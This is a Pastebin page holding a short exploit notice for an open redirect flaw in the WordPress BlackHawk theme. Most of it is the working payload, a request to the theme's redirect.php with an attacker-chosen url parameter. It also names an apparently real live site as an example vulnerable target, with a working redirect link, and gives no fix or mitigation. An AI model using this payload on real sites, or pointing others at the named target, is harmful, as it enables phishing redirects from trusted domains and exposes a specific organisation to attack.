API tools faq
paste
KingSkrupellos

WordPress BlackHawk Themes Open Redirection Vulnerability

KingSkrupellos
Nov 25th, 2018
168
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.21 KB | None | 0 0
raw download clone embed print report
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress BlackHawk Themes Open Redirection Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 26/11/2018
  6. # Vendor Homepage : wordpress.org ~ themetix.com/black-hawk/
  7. # Tested On : Windows and Linux
  8. # Category : WebApps
  9. # Version Information : N/A
  10. # Exploit Risk : Low
  11. # Vulnerability Type : CWE-601 - URL Redirection to Untrusted Site ('Open Redirect')
  12.  
  13. #################################################################################################
  14.  
  15. # Exploit :
  16.  
  17. /wp-content/themes/blackhawk/library/redirect.php?url=http://www.REDIRECTIONADDRESS.gov/
  18.  
  19. #################################################################################################
  20.  
  21. # Example Vulnerable Site =>
  22.  
  23. [+] bhccu.org/wp-content/themes/blackhawk/library/redirect.php?url=https://cxsecurity.com
  24.  
  25. #################################################################################################
  26.  
  27. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  28.  
  29. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!